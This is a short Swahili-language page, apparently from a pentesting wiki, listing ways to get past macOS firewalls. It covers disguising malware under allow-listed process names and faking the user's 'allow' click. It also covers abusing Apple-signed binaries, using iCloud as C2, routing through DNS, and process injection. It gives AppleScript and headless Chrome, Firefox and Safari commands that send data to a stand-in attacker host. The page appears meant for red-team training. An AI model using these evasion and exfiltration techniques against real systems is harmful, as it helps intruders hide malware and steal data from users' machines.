2.2 KiB
macOS Bypassing Firewalls
{{#include ../../banners/hacktricks-training.md}}
Mbinu zilizopatikana
Mbinu zifuatazo zilipatikana zikifanya kazi katika baadhi ya programu za firewall za macOS.
Kutumia majina ya orodha ya ruhusa
- Kwa mfano, kuita malware kwa majina ya michakato maarufu ya macOS kama
launchd
Kibonyezi bandia
- Ikiwa firewall inahitaji ruhusa kutoka kwa mtumiaji, fanya malware ibonyeze ruhusu
Tumia binaries zilizotiwa saini na Apple
- Kama
curl, lakini pia wengine kamawhois
Tovuti maarufu za apple
Firewall inaweza kuwa inaruhusu muunganisho kwa tovuti maarufu za apple kama apple.com au icloud.com. Na iCloud inaweza kutumika kama C2.
Kupanua kwa jumla
Wazo kadhaa za kujaribu kupita firewall
Angalia trafiki inayoruhusiwa
Kujua trafiki inayoruhusiwa kutakusaidia kubaini tovuti zinazoweza kuwa kwenye orodha ya ruhusa au programu zipi zinazoruhusiwa kuziaccess.
lsof -i TCP -sTCP:ESTABLISHED
Kutumia DNS
Marekebisho ya DNS yanafanywa kupitia mdnsreponder programu iliyosainiwa ambayo labda itaruhusiwa kuwasiliana na seva za DNS.
Kupitia programu za kivinjari
- oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
Kupitia sindano za michakato
Ikiwa unaweza kushinikiza msimbo katika mchakato ambao unaruhusiwa kuungana na seva yoyote unaweza kupita ulinzi wa firewall:
{{#ref}} macos-proces-abuse/ {{#endref}}
Marejeo
{{#include ../../banners/hacktricks-training.md}}